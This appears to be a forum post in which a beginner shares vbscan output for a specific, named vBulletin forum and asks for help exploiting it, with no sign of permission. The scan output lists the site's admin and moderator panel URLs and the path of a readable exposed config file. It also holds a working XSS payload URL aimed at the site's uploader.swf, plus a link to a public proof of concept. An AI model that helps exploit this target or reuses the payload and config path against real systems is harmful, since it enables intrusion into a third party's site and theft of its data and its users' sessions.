Hello, so I am trying to learn how to XSS and I scanned a site with vbscan on kali and turns out the forum is xss, here is the scan results..
Was hoping someone could help me in learning what to do to exploit this.
Thanks.
Code:
[+] Detecting Vbulletin based Firewall
[++] No known firewall detected
[+] Detecting vBulletin Version
[++] vBulletin 4.2.5
[+] Core Vbulletin Vulnerability
[++] Target vbulletin core is not vulnerable
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] Checking admincp/modcp path
[++] admincp Found
https://deathwishx.com/forumv2//admincp
[++] modcp Found
https://deathwishx.com/forumv2//modcp
[+] Checking validator.php
[++] validator.php is not found
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Checking c99 xml shell in admincp/subscriptions.php
[++] c99 xml shell is Not Found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking config.php.x for disclure config file
[++] Readable config file is found
config file path : https://deathwishx.com/forumv2//includes/config.php.new
[+] Checking faq.php RCE backdoor
[++] Remote Code Execute backdoor not found
[+] Checking vBSEO 3.x - LFI (Local File Inclusion) vulnerability
[++] vbseo.php LFI is not vulnerable
[+] Checking vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability
[++] xperience.php not vulnerable
[+] Checking arcade.php SQLI Vulnerability
[++] arcade.php not found
[+] Checking vBulletin YUI 2.9.0 XSS
[++] uploader.swf is vulnerable
https://deathwishx.com/forumv2//clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(/XSS/);}//
POC : https://packetstormsecurity.com/files/124746/vBulletin-YUI-2.9.0-Cross-Site-Scripting.html
[+] Checking for html tags status
[++] HTML tag are Disable
[+] Checking Vbulletin 5.x - Remote Code Execution Exploit
[++] decodeArguments is not vulnerable
Was hoping someone could help me in learning what to do to exploit this.
Thanks.